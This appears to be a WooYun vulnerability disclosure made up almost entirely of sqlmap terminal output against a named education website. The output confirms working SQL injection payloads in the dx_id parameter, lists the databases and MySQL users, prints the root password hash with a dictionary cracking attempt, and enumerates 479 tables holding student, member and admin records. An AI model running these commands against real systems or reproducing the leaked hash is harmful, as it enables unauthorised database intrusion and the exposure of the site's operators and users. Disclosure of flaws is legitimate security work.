WooYun.org

注入点：http://fw.popedu.net/zl28/index2.php?dx_id=2814

root@0nlis:/# sqlmap -u "http://fw.popedu.net/zl28/index2.php?dx_id=2814"    
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:37:35
[21:37:35] [INFO] resuming back-end DBMS 'mysql' 
[21:37:35] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: dx_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dx_id=2814 AND 4829=4829
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: dx_id=2814 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162776c71,0x4175544a4a6b7a54447a,0x7174646171),NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: dx_id=2814 AND SLEEP(5)
---
[21:37:35] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.17
back-end DBMS: MySQL 5.0.11
[21:37:35] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/fw.popedu.net'
[*] shutting down at 21:37:35
root@0nlis:/# sqlmap -u "http://fw.popedu.net/zl28/index2.php?dx_id=2814" --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:37:44
[21:37:44] [INFO] resuming back-end DBMS 'mysql' 
[21:37:45] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: dx_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dx_id=2814 AND 4829=4829
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: dx_id=2814 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162776c71,0x4175544a4a6b7a54447a,0x7174646171),NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: dx_id=2814 AND SLEEP(5)
---
[21:37:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.17
back-end DBMS: MySQL 5.0.11
[21:37:45] [INFO] fetching database names
available databases [5]:
[*] ddd_db
[*] information_schema
[*] managent
[*] mysql
[*] performance_schema
[21:37:45] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/fw.popedu.net'
[*] shutting down at 21:37:45
root@0nlis:/# sqlmap -u "http://fw.popedu.net/zl28/index2.php?dx_id=2814" --users
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:37:52
[21:37:52] [INFO] resuming back-end DBMS 'mysql' 
[21:37:52] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: dx_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dx_id=2814 AND 4829=4829
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: dx_id=2814 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162776c71,0x4175544a4a6b7a54447a,0x7174646171),NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: dx_id=2814 AND SLEEP(5)
---
[21:37:53] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.17
back-end DBMS: MySQL 5.0.11
[21:37:53] [INFO] fetching database users
database management system users [4]:
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
[21:37:53] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/fw.popedu.net'
[*] shutting down at 21:37:53
root@0nlis:/# sqlmap -u "http://fw.popedu.net/zl28/index2.php?dx_id=2814" --passwords
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:37:59
[21:37:59] [INFO] resuming back-end DBMS 'mysql' 
[21:37:59] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: dx_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dx_id=2814 AND 4829=4829
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: dx_id=2814 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162776c71,0x4175544a4a6b7a54447a,0x7174646171),NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: dx_id=2814 AND SLEEP(5)
---
[21:38:00] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.17
back-end DBMS: MySQL 5.0.11
[21:38:00] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] 
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] 
[21:38:01] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 
[21:38:02] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] 
[21:38:03] [INFO] starting dictionary-based cracking (mysql_passwd)
[21:38:28] [WARNING] no clear password(s) found                                                                                                                                              
database management system users password hashes:
[*] root [1]:
    password hash: *8D11E7BE99238B1DF8063F00C554806EFAAA1C52
[21:38:28] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/fw.popedu.net'
[*] shutting down at 21:38:28
root@0nlis:/# sqlmap -u "http://fw.popedu.net/zl28/index2.php?dx_id=2814" -D ddd_db --tables
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:38:46
[21:38:46] [INFO] resuming back-end DBMS 'mysql' 
[21:38:46] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: dx_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dx_id=2814 AND 4829=4829
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: dx_id=2814 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162776c71,0x4175544a4a6b7a54447a,0x7174646171),NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: dx_id=2814 AND SLEEP(5)
---
[21:38:46] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.17
back-end DBMS: MySQL 5.0.11
[21:38:46] [INFO] fetching tables for database: 'ddd_db'
Database: ddd_db
[479 tables]
+------------------------+
| 13t_baodao             |
| 13t_bishi              |
| 13t_fsmd               |
| 13t_lqmd               |
| 13t_lqyz               |
| 13t_mianshi            |
| 13t_sfzm               |
| 13t_tijian             |
| 13t_wyky               |
| 13t_wytl               |
| 13t_xlcs               |
| 13t_zong               |
| 13t_zyjn               |
| 14cp2                  |
| 14cp                   |
| 16ggk_student          |
| 16hjjx_student         |
| 16zqn_log              |
| 16zqn_student3         |
| 16zqn_student4         |
| 16zqn_student          |
| 16zqn_sx_log           |
| 16zqn_sx_student       |
| 16zqn_sx_xx_student    |
| 2014fushi              |
| 28_student             |
| 436ky_log              |
| 436ky_student          |
| 48_student             |
| a_sun_addr             |
| admin                  |
| admin_activity         |
| admin_activity_img     |
| admin_activity_qx      |
| admin_user             |
| ask                    |
| ask_admin_user         |
| ask_department         |
| ask_staff              |
| baolubi                |
| books_order            |
| btb_admin              |
| btb_botton             |
| btb_cp                 |
| btb_dd                 |
| btb_ddy                |
| btb_fsx                |
| btb_fsx1               |
| btb_fsx2               |
| btb_fsx2_bak           |
| btb_gg                 |
| btb_login_xx           |
| btb_qdxx               |
| btb_qx                 |
| btb_xw                 |
| btb_yx                 |
| btb_yx_zl              |
| card_member            |
| card_member_export     |
| cfshi                  |
| cfshi2013              |
| cfshi2014              |
| cfshi2014_bak          |
| cfshi2015              |
| cgxy                   |
| cl_confirm             |
| cl_kebiao              |
| cl_pro_class           |
| cl_pro_class_bak       |
| cl_pro_three           |
| cl_pro_three_bak       |
| cl_product             |
| cl_product_bak         |
| class_data             |
| cont_door              |
| cont_fengjing          |
| cont_fenshu            |
| cont_order             |
| cp                     |
| cp_admin               |
| cp_dd                  |
| cp_dd_pl               |
| cp_dz                  |
| cp_fl                  |
| cp_fwtx                |
| cp_gg                  |
| cp_gwc                 |
| cp_pl                  |
| cp_qx                  |
| cp_ywjy                |
| d_view                 |
| dd_pay                 |
| ddd_kc                 |
| diandou_admin          |
| diandou_cost           |
| diandou_data           |
| diandou_detail_data    |
| diqu                   |
| dw                     |
| dx_file                |
| dx_sxpm                |
| dx_zx                  |
| dxsx                   |
| earlybird              |
| earlybird_bj           |
| earlybird_ty           |
| earlybirdstudents      |
| ejxk_description       |
| english_danci          |
| english_exam           |
| english_question1      |
| english_wenzhang_juzi  |
| english_wenzhang_learn |
| english_zt             |
| english_zt_acl         |
| english_zt_test        |
| englisth_answer        |
| englisth_question      |
| englisth_question1     |
| erjixueke              |
| fdfa                   |
| fenshuxian             |
| fg                     |
| flxx_admin             |
| flxx_botton            |
| flxx_gg                |
| flxx_member            |
| flxx_qx                |
| flxx_xw                |
| flxx_xw_res            |
| fsx_xq                 |
| fuwu_item              |
| fuwu_order             |
| fuxi                   |
| fw                     |
| gef                    |
| gg                     |
| gongsi                 |
| gqjxy_bj               |
| gqjxy_heb              |
| gqjxy_hz               |
| gqjxy_ty               |
| gx_baolubi             |
| hangye                 |
| hd                     |
| hh                     |
| hj_admin               |
| hj_banche              |
| hj_baodao              |
| hj_ceshi               |
| hj_chaqin              |
| hj_dayi                |
| hj_dingcan             |
| hj_huiyi               |
| hj_huodong             |
| hj_jiaokuan            |
| hj_jiucan              |
| hj_log                 |
| hj_qiandao             |
| hj_qichuang            |
| hj_shangke             |
| hj_student             |
| hj_xueyuan             |
| hj_zhusu               |
| hj_ziliao              |
| hj_ziliao_ff           |
| hj_zixi                |
| hjjxy                  |
| hjjxy_bak              |
| index_dt               |
| jiangyi                |
| jiangyi_bak            |
| jiexi                  |
| jixun_zixun            |
| juan_order             |
| kc                     |
| kc_admin               |
| kc_class               |
| kc_jf                  |
| kc_jigou               |
| kc_sc                  |
| kc_skclass             |
| kczx                   |
| kjnr                   |
| kskm_baoming           |
| kskm_duibi             |
| kx                     |
| kx_pl                  |
| learn_danci            |
| learn_danci_yb         |
| learn_dcok             |
| learn_juzi             |
| learn_tiku             |
| lectures               |
| ling_ziliao            |
| m_jf                   |
| mains_message          |
| member                 |
| member_bak             |
| member_kb              |
| member_log             |
| member_log_go          |
| member_log_pl          |
| member_star            |
| member_website         |
| miyajuan               |
| mogui_news             |
| mogui_pic              |
| nbook                  |
| nbook_order            |
| nbook_sc               |
| nbook_sh               |
| nbook_shop             |
| news                   |
| news_course            |
| news_message           |
| news_zixun_message     |
| oa_adminuser           |
| oa_big_ziliao          |
| oa_dayi                |
| oa_kebiao              |
| oa_mail                |
| oa_mianshi             |
| oa_money               |
| oa_order               |
| oa_orders              |
| oa_post                |
| oa_print               |
| oa_product             |
| oa_record              |
| oa_service             |
| oa_service_tel         |
| oa_shiting             |
| oa_shouke              |
| oa_small_ziliao        |
| oa_st_data             |
| oa_student             |
| oa_teacher             |
| oa_test                |
| oa_xieyi               |
| oa_xieyi_typ           |
| oa_yingxiao_data       |
| oa_yingxiao_fa         |
| oa_yingxiao_zt         |
| oa_zhaopin             |
| oa_ziliao              |
| oa_ziliao_demand       |
| paiming                |
| peidui                 |
| political_news         |
| political_test         |
| product                |
| product_zt             |
| professional_test      |
| qm_student             |
| qmjxy                  |
| qx                     |
| rc                     |
| rc_bak                 |
| registration           |
| res_tj                 |
| reviewbooks            |
| reviewbooksrank        |
| search_order           |
| shop_cks               |
| shop_sc                |
| shop_wz                |
| shop_xw                |
| shop_ywjy              |
| sj_admin               |
| sj_banche              |
| sj_baodao              |
| sj_ceshi               |
| sj_chaqin              |
| sj_dayi                |
| sj_dingcan             |
| sj_huiyi               |
| sj_huodong             |
| sj_jiaokuan            |
| sj_jiucan              |
| sj_log                 |
| sj_qiandao             |
| sj_qichuang            |
| sj_shangke             |
| sj_student             |
| sj_xueyuan             |
| sj_zhusu               |
| sj_ziliao              |
| sj_ziliao_ff           |
| sj_zixi                |
| sk_datas               |
| sk_services            |
| sq_class               |
| sq_ziliao              |
| sq_zixun               |
| stage                  |
| sutdy_cankaoshu        |
| sutdy_dongji           |
| sutdy_ej_cankaoshu     |
| sutdy_exp              |
| sutdy_kaoshi_addr      |
| sutdy_kemu             |
| sutdy_ksbm             |
| sutdy_kshg             |
| sutdy_kskm_zhenti      |
| sutdy_pzj              |
| sutdy_shu              |
| sutdy_test_name        |
| sutdy_text_class       |
| sutdy_tiku             |
| sutdy_tixing           |
| sutdy_zhenti           |
| sutdy_zsd_cc           |
| sutdy_zsd_sy           |
| szt_admin              |
| szt_member             |
| szt_post               |
| szt_yanjs              |
| szt_zyk                |
| szt_zyk_bak            |
| teacher                |
| teacher_ms             |
| teacher_pl             |
| teacher_question       |
| teacher_rc             |
| teacher_star           |
| test_member            |
| test_num               |
| tiaoji                 |
| tiaoji_bak             |
| tiaojis                |
| tieba                  |
| tieba_news             |
| tieba_pl               |
| tj                     |
| tk                     |
| tkkm                   |
| ts_message             |
| tuan_juan              |
| video                  |
| vip16drsq01            |
| vip16drsq02            |
| vip16drsq03            |
| vip16drsq04            |
| vip16drsq05            |
| vip16drsq06            |
| vip16drsq07            |
| vip16drsq08            |
| vip16drsq09            |
| vip16drsq10            |
| vip16drsq11            |
| vip16drsq12            |
| vip16drsq13            |
| vip16drsq14            |
| vip16drsq15            |
| vip16drsq16            |
| vip16gq_student        |
| vip16sq_301            |
| vip16sq_303            |
| vip16sq_3032           |
| vip16sq_jyx            |
| vip16sq_kjzs           |
| vip16sq_nsx            |
| vip16sq_student        |
| vip16sq_sx             |
| vip16sq_zy30           |
| vip17481_student       |
| vip17dbk1_student      |
| vip17dbk2_student      |
| vip17dbk3_student      |
| vip17dbk4_student      |
| vip17dbk5_student      |
| vip17dbk6_student      |
| vip17gdk1_student      |
| vip17gdk2_student      |
| vip17gdk3_student      |
| vip17gdk4_student      |
| vip481_student         |
| vip482_log             |
| vip482_student         |
| vip4833_student        |
| vip483_log             |
| vip483_student         |
| vip484_student         |
| vip485_student         |
| vip486_student         |
| vipzd48_student        |
| wangxiao_bclass        |
| wangxiao_flv           |
| wangxiao_img           |
| wangxiao_mclass        |
| wangxiao_qx            |
| wangxiao_sclass        |
| wd_fenxiao             |
| wd_teacher             |
| wd_teacher_bak         |
| wuyi_jixun             |
| wuyi_jixun_bj          |
| wuyi_jixun_ty          |
| wuyi_jixunk            |
| wy_student             |
| wzgy                   |
| xuekemenlei            |
| xuexiao                |
| xuexiao_bak            |
| xuexiao_img            |
| xuexiao_zy             |
| xuexiao_zy2013         |
| xw                     |
| xx_pl                  |
| xyxs                   |
| ydxx                   |
| yijixueke              |
| yonghuxinxi            |
| youxue                 |
| yqlj                   |
| yuanxi                 |
| yuanxi_bak             |
| yx_student             |
| yy_bm                  |
| yy_jt                  |
| zhanzuo                |
| zhanzuo_kb             |
| zhanzuo_z              |
| zhaopin_new            |
| zhuanti                |
| zhufu                  |
| ziliao                 |
| ziliao_admin           |
| ziliao_bak             |
| ziliao_jf              |
| ziliao_jf_bak          |
| ziliao_jy              |
| ziliao_pl              |
| ziliao_sc              |
| ziliao_type            |
| ziliao_type_bak        |
| ziliao_xiazai          |
| zjhy_student           |
| zjnl_student           |
| zlandfw                |
| zp_book                |
| zp_fuxi                |
| zp_renwu               |
| zp_shuny               |
| zp_teacher             |
| zp_tixing              |
| zp_tongzhi             |
| zp_zhangny             |
| zqn10_student          |
| zqn10_student2         |
| zqn10_student3         |
| zqn10_student4         |
| zqn10_student5         |
| zsjz                   |
| zsjz_message           |
| zt_log                 |
| zt_student             |
| ztjx_new               |
| ztjx_pl                |
| ztxz                   |
| zuowei                 |
| zuoweisn               |
| zy_ask_class           |
| zy_course              |
| zy_cuoti               |
| zy_cuoti_ben           |
| zy_flv                 |
| zy_friend              |
| zy_kskm                |
| zy_message             |
| zy_pic                 |
| zy_talk                |
| zy_talk_bak            |
| zy_teacher             |
| zy_tiku                |
| zy_tixing              |
| zy_video               |
| zykj                   |
+------------------------+
[21:38:46] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/fw.popedu.net'
[*] shutting down at 21:38:46